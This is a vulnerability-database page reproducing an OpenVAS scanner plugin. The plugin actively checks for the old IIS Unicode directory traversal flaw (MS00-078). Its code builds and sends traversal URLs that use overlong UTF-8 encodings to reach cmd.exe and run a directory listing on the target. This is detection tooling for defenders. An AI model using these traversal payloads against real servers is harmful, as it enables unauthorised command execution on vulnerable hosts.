Lucene search
+L

Microsoft IIS Directory Traversal Vulnerability (MS00-078) - Active Check

🗓️ 16 Mar 2009 00:00:00Reported by Copyright (C) 2009 Christian Eric EdjengueleType 
openvas
 openvas
🔗 plugins.openvas.org👁 83 Views

Microsoft IIS Directory Traversal Vulnerability (MS00-078) - Active Check - Vulnerability in Microsoft II

Related
Refs
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Microsoft IIS Input Validation Directory Traversal (CVE-2000-0884)
17 Mar 201400:00
checkpoint_advisories
Check Point Advisories
Microsoft IIS EXE W32 Storm Worm Command Execution - Ver2 (CVE-2000-0884)
16 Apr 201400:00
checkpoint_advisories
CVE
CVE-2000-0884
22 Jan 200105:00
cve
Cvelist
CVE-2000-0884
22 Jan 200105:00
cvelist
Tenable Nessus
Microsoft IIS Unicode Remote Command Execution
18 Oct 200000:00
nessus
NVD
CVE-2000-0884
19 Dec 200005:00
nvd
OpenVAS
IIS directory traversal
3 Nov 200500:00
openvas
OpenVAS
Microsoft IIS Directory Traversal Vulnerability (MS00-078) - Active Check
3 Nov 200500:00
openvas
Saint
IIS Unicode Directory Traversal
3 Jul 200600:00
saint
Saint
IIS Unicode Directory Traversal
3 Jul 200600:00
saint
Rows per page
# SPDX-FileCopyrightText: 2009 Christian Eric Edjenguele
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later

CPE = "cpe:/a:microsoft:internet_information_services";

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.101014");
  script_version("2026-04-28T06:28:06+0000");
  script_tag(name:"last_modification", value:"2026-04-28 06:28:06 +0000 (Tue, 28 Apr 2026)");
  script_tag(name:"creation_date", value:"2009-03-16 23:15:41 +0100 (Mon, 16 Mar 2009)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2000-0884");
  script_name("Microsoft IIS Directory Traversal Vulnerability (MS00-078) - Active Check");
  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2009 Christian Eric Edjenguele");
  script_family("Windows : Microsoft Bulletins");
  script_dependencies("gb_microsoft_iis_http_detect.nasl");
  script_require_ports("Services/www", 80);
  script_mandatory_keys("microsoft/iis/http/detected");

  script_xref(name:"URL", value:"https://learn.microsoft.com/en-us/security-updates/securitybulletins/2000/ms00-078");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/1806");

  script_tag(name:"summary", value:"Microsoft IIS is prone to a directory traversal
  vulnerability.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_tag(name:"impact", value:"This vulnerability could potentially allow a visitor to a web
  site to take a wide range of destructive actions against it, including running programs on it.");

  script_tag(name:"affected", value:"Microsoft IIS 4.0 and 5.0 is known to be affected.");

  script_tag(name:"solution", value:"There is not a new patch for this vulnerability. Instead, it is
  eliminated by the patch that accompanied Microsoft Security Bulletin MS00-057. Please see the
  references for more information.");

  script_tag(name:"solution_type", value:"VendorFix");
  # nb: Response check doesn't look that reliable these days...
  script_tag(name:"qod_type", value:"remote_analysis");

  exit(0);
}

include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");

# remote command to run
r_cmd = "/winnt/system32/cmd.exe?/c+dir+c:";

d = make_list("/scripts/",
              "/msadc/",
              "/iisadmpwd/",
              "/_vti_bin/",
              "/_mem_bin/",
              "/exchange/",
              "/pbserver/",
              "/rpc/",
              "/cgi-bin/",
              "/");

uc = make_list("%c0%af",
               "%c0%9v",
               "%c1%c1",
               "%c0%qf",
               "%c1%8s",
               "%c1%9c",
               "%c1%pc",
               "%c1%1c",
               "%c0%2f",
               "%e0%80%af");

if( ! port = get_app_port( cpe:CPE, service:"www" ) )
  exit( 0 );

if( ! get_app_location( cpe:CPE, port:port, nofork:TRUE ) )
  exit( 0 );

foreach webdir( d ) {

  foreach uni_code( uc ) {

    url = strcat( webdir , ".." , uni_code , ".." , uni_code , ".." , uni_code , ".." , uni_code , ".." , uni_code , ".." , r_cmd );

    qry = string( "/" + url );

    req = http_get( item:qry, port:port );
    reply = http_keepalive_send_recv( port:port, data:req, bodyonly:FALSE );
    if( reply ) {

      header_server = egrep( pattern:"Server", string:reply, icase:TRUE );
      if( ( "Microsoft-IIS" >< header_server ) && ( egrep( pattern:"^HTTP/1\.[01] 200", string:reply ) ) &&
          ( ( "<dir>" >< reply ) || "directory of" >< reply ) ) {
        report = string( "Exploit String", url ," for vulnerability:\n", reply );
        security_message( port:port, data:report );
        exit( 0 );
      }
    }
  }
}

exit( 99 );

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2026 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS 27.5
EPSS0.7055
83